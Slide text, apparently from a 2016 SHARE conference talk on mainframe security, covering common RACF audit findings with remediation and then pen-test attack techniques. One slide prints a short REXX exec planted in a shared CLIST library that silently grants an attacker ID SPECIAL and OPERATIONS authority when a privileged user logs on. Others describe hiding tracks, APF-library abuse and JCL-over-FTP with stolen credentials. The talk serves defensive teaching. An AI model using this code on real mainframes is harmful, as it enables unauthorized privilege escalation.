Co-presentation with Brian Marshall, Mark Wilson, and Chad Rikansrud at SHARE Atlanta, 2016. - Discussing The various approaches to mainframe security and hacking.
6. www.share.org/sanan
tonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
Finding
Explanation
Risk
Recommended
Best Practice and
Remediation
Critical data sets with ‘global access’ greater than READ
The UACC value in RACF for a dataset profile defines the default level of access to
which any user whose user ID or a group to which it has been connected does not
appear in the access list. The ALL record in Top Secret contains data sets that have a
default level of access for all users. There is no equivalent in CA ACF2, everything
must be explicitly allowed.
Data sets that are protected by a ‘global access’ greater than READ will allow most
users with system access to modify critical data residing in these data sets. In addition,
users may be able to delete any data set covered by the dataset profiles that have
global access defined.
Review each of these profiles and determine whether the ‘global access’ is appropriate.
For those profiles where access is excessive, you will have to determine who really
needs access before changing the ‘global access’. To find out who is accessing these
data sets, review SMF data to determine who is accessing the data sets with greater
than READ access.
“Top Five” Assessment Finding #4
7. www.share.org/sanan
tonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
Finding
Explanation
Risk
Recommended
Best Practice and
Remediation
Sensitive Data Sets with ‘global access’ Greater than NONE
The UACC value in RACF for a dataset profile defines the default level of access to
which any user whose user ID or a group to which it has been connected does not
appear in the access list. The ALL record in Top Secret contains data sets that have a
default level of access for all users. There is no equivalent in CA ACF2, everything
must be explicitly allowed.
Data sets that are protected by ‘global access’ greater than NONE allow most users
with system access to read or modify these data sets. In addition, users may be able to
delete any data set covered by the dataset profiles that have global access defined.
Review each of these profiles and determine whether the ‘global access’ is appropriate.
For those profiles where access is excessive, you will have to determine who really
needs access before changing the ‘global access’. To find out who is accessing these
data sets, review SMF data to determine who is accessing the data sets with the ‘global
access’.
“Top Five” Assessment Finding #3
8. www.share.org/sanan
tonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
Finding
Explanation
Risk
Remediation
Inappropriate Usage of z/OS UNIX Superuser Privilege, UID=0
User IDs with z/OS UNIX superuser authority, UID(0), have full access to all UNIX
directories and files and full authority to administer z/OS UNIX.
Since the UNIX environment is the z/OS portal for critical applications such as file transfers,
Web applications, and TCPIP connectivity to the network in general, the ability of these
superusers to accidentally or maliciously affect these operations is a serious threat. No
personal user IDs should be defined with an OMVS segment specifying UID(0).
The assignment of UID(0) authority should be minimized by managing superuser privileges
by granting access to one or more of the ‘BPX.qualifier’ profiles in the FACILITY class and/or
access to one or more profiles in the UNIXPRIV class.
“Top Five” Assessment Finding #2
9. www.share.org/sanan
tonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
Finding
Explanation
Risk
Remediation
Excessive Number of User IDs with No Password Interval
User IDs with no password Interval are not required to change their passwords
Since passwords do not need to be changed periodically, people who knew a
password for an ID could still access that ID even if they are no longer authorized
users.
Review each of the personal user profiles to determine why they require no expiration.
Their passwords should adhere to the company policy regarding password changes.
If the user ID is being used for started tasks or surrogate, it should be reviewed and
changed to the appropriate ESM privilege.
“Top Five” Assessment Finding #1
11. www.share.org/sanan
tonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
Top Ten Critical Assessment Findings in
Mainframe Environments
74% Excessive Number of User ID’s with no Password Interval SEVERE
60% Inappropriate Usage of z/OS UNIX Superuser Privilege, UID = 0 SEVERE
54% Sensitive Data Sets with ‘global access’ Greater than NONE SEVERE
54% Critical Data Sets with ‘global access’ Greater than READ HIGH
53% Started Task IDs are not Defined as ‘protected’ IDs HIGH
52% Improper Use or Lack of UNIXPRIV Profiles HIGH
44% Excessive Access to the SMF Data Sets HIGH
42% Excessive Access to APF Libraries SEVERE
42% Excessive Access to z/OS UNIX File System Data Sets HIGH
40% ESM Database(s) is not Adequately Protected SEVERE
10/14/15
17. www.share.org/sanan
tonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
Poorly protected APF lib’s
● Very simple exploit
● It not uncommon to find hundreds of users having update access
to APF authorised libraries……
● What's most alarming is that the client site(s) typically has 10 or
less system programmers
● Having update authority to an APF authorised library means I can
write my own authorised code and run it undetected
22. www.share.org/sanan
tonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
Now the good bit!
● Why/How does this work?
● Well that little bit of code flipped a flag in my ACEE to turn on the
RACF SPECIAL flag for my instorage ACEE
● This can be modified so that it looks very innocent, e.g. part of a
translate table, or it can be rewritten in a virus-type manner,
making it more difficult to disassemble
24. www.share.org/sanan
tonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
CLIST/REXX Issues
● We quite often see CLIST/REXX Libraries that are universally
updateable that are not at the bottom of the list of concatenated
datasets for SYSPROC or SYSEXEC
● Simply find an exec that is lower down in the concatenation that
is used by one of the privileged users (Sec Admin, Sysprog, etc)
● Copy an exec to the universally accessible dataset and add a bit
of your own code
25. www.share.org/sanan
tonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
CLIST/REXX Issues
● An Example
● When doing a Pen test we determined that we had UPDATE
authority to a CLIST/REXX Library allocated and used each time
we logged on to TSO…the dataset was called USER.CLIST
● Add to this the fact that
– All users via their Logon Proc call the same exec WBA001
● A simple update to WBA001 to call a little piece of code….
● And then just sit and wait….
27. www.share.org/sanan
tonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
CLIST/REXX Issues
The contents of USER.CLIST(MYCMD)
/* REXX */
/***************************************************/
/* Trap the responses so no messages issued to the */
/* user as they logon…. */
/***************************************************/
TEMP = OUTTRAP(LINE.)
/* is this the user I want to exploit?? */
UID =sysvar(sysuid)
/* If so get THEM to issue the command you want */
IF UID = CHAD or BRIAN then do
address tso alu MY_HACKER_ID SPECIAL OPERATIONS
End
Could use a
prefix (SUBSTR)
for a group of
users!
28. www.share.org/sanan
tonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
CLIST/REXX Issues
● So why pick on CHAD or BRIAN?
– We determined from looking at the syslog and output on the
Q that CHAD and BRIAN were RACF SYSTEM SPECIAL
● So the next time either of them logs onto the system any
command entered into mycmd is run…game over….
● I can even cover my tracks my resetting the ISPF stats to show
another userid having last changed WBA001 and MYCMD
● Imagine if I changed it to CHAD or BRIAN!!
30. www.share.org/sanan
tonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
Introduction – Chad Rikansrud
• 20 Years in Information Technology
• Networking Protocols / Forensics
• Programming (Assembler, C, Python, others)
• Security & Security Research (z/OS, x86_64)
– Contributor to open source projects:
• Metasploit, r2 disassembly framework, scrypt
• Cryptography implementations / protocols
• Capture the Flag builder (BSides DFW,MSP)
• Speaker at DEF CON, Derbycon, MN SEC, Others
31. www.share.org/sanan
tonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
How the bad guys think
● Let’s assume 3 types of attackers:
– No mainframe knowledge, but skilled at exploits / other OS’s
– Some mainframe knowledge, also skilled at other OS’s
– Mainframe knowledge + hacking skills
● Look at 3 possible attacks (based on the above)
– JAVA deserialization / poor configuration (works out of the box)
– Scrape credentials (Clear or Self-Signed Cert) – use to submit remote JCL
– SMP/E injection & Forgery
32. www.share.org/sanan
tonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
Attack #1 - JAVA
Java
• Gift that keeps giving
• Combination of inherent vulnerabilities (Fixed with patching
SMP/E, etc) and poorly written code.
• Deserialization attacks (Common Libraries / Bad code)
• Java takes care of the Code Page issues (Good for you/Good for
them!)
Java Exploit Demo
34. www.share.org/sanan
tonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
Attack #2 – JCL over FTP w/Stolen Creds
JCL over FTP
• Fantastic way to remotely exploit system with given creds.
• How to get creds (Sniff wire, MITM Self-Signed Cert).
• How to submit reliable JCL over FTP (Metasploit)
• What to submit? (Shells, pull password database, etc.)
JCL over FTP demo
41. www.share.org/sanan
tonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
Related Sessions
Session # Session Title Date and Time Room Speaker(s)
19683 RACF Monitoring & Reporting 2016-08-02, 12:30:00 L402 Robert S. Hansel
19639 RACF Update 2016-08-03, 08:30:00 L401 Mark Nelson, Julie A. Bergh
19638 CA ACF2 & CA Top Secret Update - R16 is Finally Here! 2016-08-03, 10:00:00 L401 Carla Flores
19612
HiperSockets: Capabilities, z/OS Config, Comparison to OSA, RoCE and SMC-D, and
Routing to Linux on z 2016-08-03, 11:15:00 A601 Linda Harrison
19646
RACF IRRXUTIL, System REXX, and the IBM Health Checker for z/OS: A Perfect
Combination! 2016-08-03, 13:45:00 L402 Mark Nelson, Julie A. Bergh
19782 Experiences with Two Factor Authentication (2FA) on z/OS 2016-08-03, 15:15:00 A704 Gary Morgan, Steve Brinkley
19464 Encryption? Yeah, We Do That 2016-08-04, 10:00:00 L505 Phil Smith III
19389 Can CICS Be Hacked? Are Yesterday's Practices Today's Exposure? 2016-08-04, 10:00:00 A602 Leigh Compton
19655
Preparing for a Security Audit? Introducing Key Tracking, Key Validity and Key
Archival Using ICSF (Integrated Cryptographic Service Facility) 2016-08-04, 13:45:00 A601 Eysha Shirrine Powers
19241 z/OS Communications Server Security Using Policy Agent 2016-08-04, 13:45:00 L401 Linda Harrison
19804 PAGENT & RACF: Security from within the Black Box and Beyond 2016-08-04, 16:30:00 L508 Brian Marshall, Marlaina Chirdon
19239 Safe and Secure Transfers with z/OS FTP 2016-08-04, 16:30:00 L402 Chris Meyer; Sam Reynolds
19424 A New Look at Mainframe Hacking and Penetration Testing 2016-08-05, 08:30:00 L402 Mark Wilson
19765
SHARE Live! - High Expectations: Our Systems Are (or Could Be) as Secure as
Airplanes 2016-08-05, 11:15:00 A702 Mark Nelson